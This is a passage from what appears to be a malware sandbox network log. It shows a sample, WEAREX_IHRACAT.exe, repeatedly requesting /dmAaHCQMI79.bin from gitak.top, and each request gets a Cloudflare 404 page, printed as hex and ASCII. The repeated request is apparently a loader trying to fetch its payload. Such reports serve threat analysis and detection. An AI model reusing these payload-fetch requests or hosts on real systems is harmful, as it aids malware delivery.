                        2024-08-29 10:45:44 UTC1369INData Raw: 6d 3a 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 20 66
                        Data Ascii: m: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: f
                        2024-08-29 10:45:44 UTC921INData Raw: 32 38 36 2d 32 2e 33 35 33 20 31 32 2e 34 31 35 20 32 2e 37 31 35 20 31 36 2e 32 35 38 6c 33 34 2e 36 39 39 20 32 36 2e 33 31 63 35 2e 32 30 35 20 33 2e 39 34 37 20 31 32 2e 36 32 31 20 33 2e 30 30 38 20 31 36 2e 36 36 35 2d 32 2e 31 32 32 20 31 37 2e 38 36 34 2d 32 32 2e 36 35 38 20 33 30 2e 31 31 33 2d 33 35 2e 37 39 37 20 35 37 2e 33 30 33 2d 33 35 2e 37 39 37 20 32 30 2e 34 32 39 20 30 20 34 35 2e 36 39 38 20 31 33 2e 31 34 38 20 34 35 2e 36 39 38 20 33 32 2e 39 35 38 20 30 20 31 34 2e 39 37 36 2d 31 32 2e 33 36 33 20 32 32 2e 36 36 37 2d 33 32 2e 35 33 34 20 33 33 2e 39 37 36 43 32 34 37 2e 31 32 38 20 32 33 38 2e 35 32 38 20 32 31 36 20 32 35 34 2e 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20
                        Data Ascii: 286-2.353 12.415 2.715 16.258l34.699 26.31c5.205 3.947 12.621 3.008 16.665-2.122 17.864-22.658 30.113-35.797 57.303-35.797 20.429 0 45.698 13.148 45.698 32.958 0 14.976-12.363 22.667-32.534 33.976C247.128 238.528 216 254.941 216 296v4c0 6.627 5.373 12 12
                        2024-08-29 10:45:44 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        32192.168.11.2049808172.67.207.2194436300C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        TimestampBytes transferredDirectionData
                        2024-08-29 10:45:54 UTC169OUTGET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:45:55 UTC682INHTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:45:55 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 148
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CeJDVuF8OdH73QzQxhx6Ya%2By2rTERqsl2K1PkHi6bLgELQ%2FqL6nLvm10nk7D7QPkyypge0Qv2G2NkjWPH%2F8B7rk9Te4lhDOrjOfdWum19e%2FRC%2BdAzDoTfYaziJw%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babf44b2cbf7fa2-IAD
                        alt-svc: h3=":443"; ma=86400
                        2024-08-29 10:45:55 UTC687INData Raw: 62 39 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f
                        Data Ascii: b96<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co
                        2024-08-29 10:45:55 UTC1369INData Raw: 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 20 66 61 64 65 49
                        Data Ascii: 0px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeI
                        2024-08-29 10:45:55 UTC917INData Raw: 32 2e 33 35 33 20 31 32 2e 34 31 35 20 32 2e 37 31 35 20 31 36 2e 32 35 38 6c 33 34 2e 36 39 39 20 32 36 2e 33 31 63 35 2e 32 30 35 20 33 2e 39 34 37 20 31 32 2e 36 32 31 20 33 2e 30 30 38 20 31 36 2e 36 36 35 2d 32 2e 31 32 32 20 31 37 2e 38 36 34 2d 32 32 2e 36 35 38 20 33 30 2e 31 31 33 2d 33 35 2e 37 39 37 20 35 37 2e 33 30 33 2d 33 35 2e 37 39 37 20 32 30 2e 34 32 39 20 30 20 34 35 2e 36 39 38 20 31 33 2e 31 34 38 20 34 35 2e 36 39 38 20 33 32 2e 39 35 38 20 30 20 31 34 2e 39 37 36 2d 31 32 2e 33 36 33 20 32 32 2e 36 36 37 2d 33 32 2e 35 33 34 20 33 33 2e 39 37 36 43 32 34 37 2e 31 32 38 20 32 33 38 2e 35 32 38 20 32 31 36 20 32 35 34 2e 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35
                        Data Ascii: 2.353 12.415 2.715 16.258l34.699 26.31c5.205 3.947 12.621 3.008 16.665-2.122 17.864-22.658 30.113-35.797 57.303-35.797 20.429 0 45.698 13.148 45.698 32.958 0 14.976-12.363 22.667-32.534 33.976C247.128 238.528 216 254.941 216 296v4c0 6.627 5.373 12 12 12h5
                        2024-08-29 10:45:55 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        33192.168.11.2049809172.67.207.2194436300C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        TimestampBytes transferredDirectionData
                        2024-08-29 10:46:05 UTC169OUTGET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:46:05 UTC676INHTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:46:05 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 158
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E9rZlVeDhwdqDZZGjQhu0dUlwNp5yTVN8CDPGJU6B0zoyrVMK4M2SFsG29iaDHhvENveahuXEZqOdbgnOQVQ2sHWgdBRoqWOO4U3NgF%2Bq5TZHM0nMTlkHxOy%2FqM%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babf48cbb7f5b16-IAD
                        alt-svc: h3=":443"; ma=86400
                        2024-08-29 10:46:05 UTC693INData Raw: 62 39 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f
                        Data Ascii: b96<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co
                        2024-08-29 10:46:05 UTC1369INData Raw: 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 20 66 61 64 65 49 6e 3b 0a 09 09 09
                        Data Ascii: margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;
                        2024-08-29 10:46:05 UTC911INData Raw: 31 32 2e 34 31 35 20 32 2e 37 31 35 20 31 36 2e 32 35 38 6c 33 34 2e 36 39 39 20 32 36 2e 33 31 63 35 2e 32 30 35 20 33 2e 39 34 37 20 31 32 2e 36 32 31 20 33 2e 30 30 38 20 31 36 2e 36 36 35 2d 32 2e 31 32 32 20 31 37 2e 38 36 34 2d 32 32 2e 36 35 38 20 33 30 2e 31 31 33 2d 33 35 2e 37 39 37 20 35 37 2e 33 30 33 2d 33 35 2e 37 39 37 20 32 30 2e 34 32 39 20 30 20 34 35 2e 36 39 38 20 31 33 2e 31 34 38 20 34 35 2e 36 39 38 20 33 32 2e 39 35 38 20 30 20 31 34 2e 39 37 36 2d 31 32 2e 33 36 33 20 32 32 2e 36 36 37 2d 33 32 2e 35 33 34 20 33 33 2e 39 37 36 43 32 34 37 2e 31 32 38 20 32 33 38 2e 35 32 38 20 32 31 36 20 32 35 34 2e 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32
                        Data Ascii: 12.415 2.715 16.258l34.699 26.31c5.205 3.947 12.621 3.008 16.665-2.122 17.864-22.658 30.113-35.797 57.303-35.797 20.429 0 45.698 13.148 45.698 32.958 0 14.976-12.363 22.667-32.534 33.976C247.128 238.528 216 254.941 216 296v4c0 6.627 5.373 12 12 12h56c6.62
                        2024-08-29 10:46:05 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        34192.168.11.2049810172.67.207.2194436300C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        TimestampBytes transferredDirectionData
                        2024-08-29 10:46:15 UTC169OUTGET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:46:16 UTC682INHTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:46:16 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 169
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XpFerUiOo3ZV%2BbxUG8g34luJU5ejspS3NVs3q3CJs2XmEzhBLIZLkq89aryqZdIuxLnwRKNWVBj0ZdMOukG4KD%2FvXYU%2FB4y%2Bz%2FWxC6azEhijd6PBBys1vx21i1o%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babf4ce5fc505e2-IAD
                        alt-svc: h3=":443"; ma=86400
                        2024-08-29 10:46:16 UTC687INData Raw: 62 39 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f
                        Data Ascii: b96<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co
                        2024-08-29 10:46:16 UTC1369INData Raw: 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 20 66 61 64 65 49
                        Data Ascii: 0px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeI
                        2024-08-29 10:46:16 UTC917INData Raw: 32 2e 33 35 33 20 31 32 2e 34 31 35 20 32 2e 37 31 35 20 31 36 2e 32 35 38 6c 33 34 2e 36 39 39 20 32 36 2e 33 31 63 35 2e 32 30 35 20 33 2e 39 34 37 20 31 32 2e 36 32 31 20 33 2e 30 30 38 20 31 36 2e 36 36 35 2d 32 2e 31 32 32 20 31 37 2e 38 36 34 2d 32 32 2e 36 35 38 20 33 30 2e 31 31 33 2d 33 35 2e 37 39 37 20 35 37 2e 33 30 33 2d 33 35 2e 37 39 37 20 32 30 2e 34 32 39 20 30 20 34 35 2e 36 39 38 20 31 33 2e 31 34 38 20 34 35 2e 36 39 38 20 33 32 2e 39 35 38 20 30 20 31 34 2e 39 37 36 2d 31 32 2e 33 36 33 20 32 32 2e 36 36 37 2d 33 32 2e 35 33 34 20 33 33 2e 39 37 36 43 32 34 37 2e 31 32 38 20 32 33 38 2e 35 32 38 20 32 31 36 20 32 35 34 2e 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35
                        Data Ascii: 2.353 12.415 2.715 16.258l34.699 26.31c5.205 3.947 12.621 3.008 16.665-2.122 17.864-22.658 30.113-35.797 57.303-35.797 20.429 0 45.698 13.148 45.698 32.958 0 14.976-12.363 22.667-32.534 33.976C247.128 238.528 216 254.941 216 296v4c0 6.627 5.373 12 12 12h5
                        2024-08-29 10:46:16 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        35192.168.11.2049811172.67.207.2194436300C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        TimestampBytes transferredDirectionData
                        2024-08-29 10:46:26 UTC169OUTGET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:46:26 UTC680INHTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:46:26 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 179
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CNIMbtOHrHgJlLrjgfSeKe%2FL%2BGXi9zf5%2B4BVoo87xepPBkNa48MR2OZKtRgL2hVw06Eoyk8ByvYbFOoZq%2FZs8XbiuIqUfl5P2iAH2OBG4iNDvsOkUL2ItgjTUsU%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babf50feb7f0949-IAD
                        alt-svc: h3=":443"; ma=86400
                        2024-08-29 10:46:26 UTC689INData Raw: 62 39 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f
                        Data Ascii: b96<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co
                        2024-08-29 10:46:26 UTC1369INData Raw: 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 20 66 61 64 65 49 6e 3b
                        Data Ascii: x;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;
                        2024-08-29 10:46:26 UTC915INData Raw: 33 35 33 20 31 32 2e 34 31 35 20 32 2e 37 31 35 20 31 36 2e 32 35 38 6c 33 34 2e 36 39 39 20 32 36 2e 33 31 63 35 2e 32 30 35 20 33 2e 39 34 37 20 31 32 2e 36 32 31 20 33 2e 30 30 38 20 31 36 2e 36 36 35 2d 32 2e 31 32 32 20 31 37 2e 38 36 34 2d 32 32 2e 36 35 38 20 33 30 2e 31 31 33 2d 33 35 2e 37 39 37 20 35 37 2e 33 30 33 2d 33 35 2e 37 39 37 20 32 30 2e 34 32 39 20 30 20 34 35 2e 36 39 38 20 31 33 2e 31 34 38 20 34 35 2e 36 39 38 20 33 32 2e 39 35 38 20 30 20 31 34 2e 39 37 36 2d 31 32 2e 33 36 33 20 32 32 2e 36 36 37 2d 33 32 2e 35 33 34 20 33 33 2e 39 37 36 43 32 34 37 2e 31 32 38 20 32 33 38 2e 35 32 38 20 32 31 36 20 32 35 34 2e 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63
                        Data Ascii: 353 12.415 2.715 16.258l34.699 26.31c5.205 3.947 12.621 3.008 16.665-2.122 17.864-22.658 30.113-35.797 57.303-35.797 20.429 0 45.698 13.148 45.698 32.958 0 14.976-12.363 22.667-32.534 33.976C247.128 238.528 216 254.941 216 296v4c0 6.627 5.373 12 12 12h56c
                        2024-08-29 10:46:26 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        36192.168.11.2049812172.67.207.2194436300C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        TimestampBytes transferredDirectionData
                        2024-08-29 10:46:36 UTC169OUTGET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:46:37 UTC672INHTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:46:37 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: EXPIRED
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vTE2Sv77XFRjvS8qsqlko1AXrAWneT8Lgnx0krqqZJj%2BallBnvx8eQbG%2B5eDjz4dxLXn7pF1jYX4RbWUL9ZzMDi6nY8h%2FHmfHx3PDDnRzctcZXY5xqeDFxXgX2w%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babf5518b0c05c2-IAD
                        alt-svc: h3=":443"; ma=86400
                        2024-08-29 10:46:37 UTC697INData Raw: 62 39 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f
                        Data Ascii: b96<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co
